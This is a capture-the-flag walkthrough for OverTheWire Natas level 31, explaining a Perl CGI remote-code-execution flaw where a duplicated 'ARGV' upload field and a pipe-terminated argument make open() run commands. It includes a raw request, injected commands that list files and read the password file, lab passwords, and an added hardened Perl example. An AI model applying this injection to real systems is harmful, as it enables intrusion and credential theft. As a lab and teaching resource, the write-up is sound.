Natas32
Website URL: http://overthewire.org/wargames/natas/natas32.html
According to the data on the OverTheWire webpage.
Username: natas32
URL: http://natas32.natas.labs.overthewire.org
Let’s log into the URL for Natas31

Looking at the source:

So, it seems the script reads the provided CSV file and splits the content to display it in a tabular format. While displaying the content, it also HTML-escapes each cell.
Based on this observation, we know that we have to exploit this file reading and rendering capability of the script by making it render the contents of our password file.
Let’s have a closer look at the request that the script is sending, and at the script code itself.
POST /index.pl HTTP/1.1
Host: natas31.natas.labs.overthewire.org
Referer: http://natas31.natas.labs.overthewire.org/index.pl?/bin/uname%20|
Content-Type: multipart/form-data; boundary=---------------------------132385328517239476721658232560
Content-Length: 356
Authorization: Basic bmF0YXMzMTpoYXk3YWVjdXVuZ2l1S2FlenVhdGh1azliaWluMHB1MQ==
Connection: close

-----------------------------132385328517239476721658232560
Content-Disposition: form-data; name="file"; filename="test.csv"
Content-Type: text/csv

test,test2
-----------------------------132385328517239476721658232560
Content-Disposition: form-data; name="submit"

Upload
-----------------------------132385328517239476721658232560--
So, notice the Content-Type header. It is set to multipart/form-data with the boundary string: "---------------------------132385328517239476721658232560"
Referring back to the source code, we find that the file object has been created with no input sanitization! That opens the script up to an RCE vulnerability, as pointed out by Netanel Rubin in his talk "Perl Jam 2" at Black Hat 2016.
Basically, the script above could be exploited based on the following facts:
- If, instead of a single file, we manage to send a list of file descriptors, or a list containing a mix of data types, the script will still accept it, since it only checks whether one of the values is a file descriptor.
- The ‘<$file>’ statement can parse through arguments if $file is set to the string ‘ARGV’.
- The open function will execute a filename as a command instead of opening it if it is terminated with a ‘|’ character.
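The three facts above, seen from the defender's side. This is an added example and not the Natas31 script: the unsafe handler is an assumed reconstruction of the pattern the writeup describes, and the hardened handler beside it takes only the real upload handle, so a user-supplied string can never reach <> or open().

```perl
#!/usr/bin/perl
# Added example (assumed reconstruction, not the original index.pl).
use strict;
use warnings;
use CGI;
use HTML::Entities qw(encode_entities);

my $cgi = CGI->new;

# UNSAFE: upload() only answers "is any 'file' value a filehandle?", while
# param() in scalar context hands back the *first* value, which a repeated
# form field can make the plain string "ARGV". <$file> then treats that
# string as the magic ARGV handle and 2-arg-opens every name in @ARGV
# (which the CGI server fills from the query string), so a name that ends
# in "|" is executed as a command instead of being opened.
sub render_csv_unsafe {
    return unless $cgi->upload('file');
    my $file = $cgi->param('file');
    while (my $line = <$file>) {
        chomp $line;
        print '<tr>', (map { '<td>' . encode_entities($_) . '</td>' }
                        split /,/, $line), "</tr>\n";
    }
}

# HARDENED: use the filehandle objects themselves, insist on exactly one
# upload, reject anything that is not a real open handle, and bound the
# amount of work a single upload can cause.
sub render_csv_safe {
    my @handles = $cgi->upload('file');
    die "exactly one uploaded file expected\n" unless @handles == 1;
    my $fh = $handles[0];
    die "not a real filehandle\n" unless ref $fh && defined fileno($fh);
    my $max_lines = 10_000;
    while (my $line = <$fh>) {
        last if $max_lines-- <= 0;
        chomp $line;
        print '<tr>', (map { '<td>' . encode_entities($_) . '</td>' }
                        split /,/, $line), "</tr>\n";
    }
    close $fh;
}

print $cgi->header('text/html');
print "<table>\n";
render_csv_safe();
print "</table>\n";
```

Because the hardened version never evaluates the "ARGV" string and never calls open() on user data, the duplicated form field and the trailing "|" in the query string have nothing to act on.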
The combination of the above three gives us a very potent RCE as we shall see below. Let’s modify the above Request as follows:
Duplicate the form-data block, and insert the text "ARGV" as its content with the name "file". Also, add a parameter to the POST destination to fill in the arguments to the script. Remember that if the exploit works, the string you provide as the argument will be executed. So the string has to be a valid command, otherwise we won't see a proper output. Let's use "/bin/ls%20.%20|" as the string. It will run a basic ls command on the current directory. Note that the string has to be terminated by a '|', otherwise the open() function will not execute the command. Let's send this request and see the response.

Ooh la la! It worked! We have RCE! Let’s get the password to the next level by modifying the command to “/bin/cat%20/etc/natas_webpass/natas32%20|”

Done!
Password for next level: no1vohsheCaiv3ieH4em1ahchisainge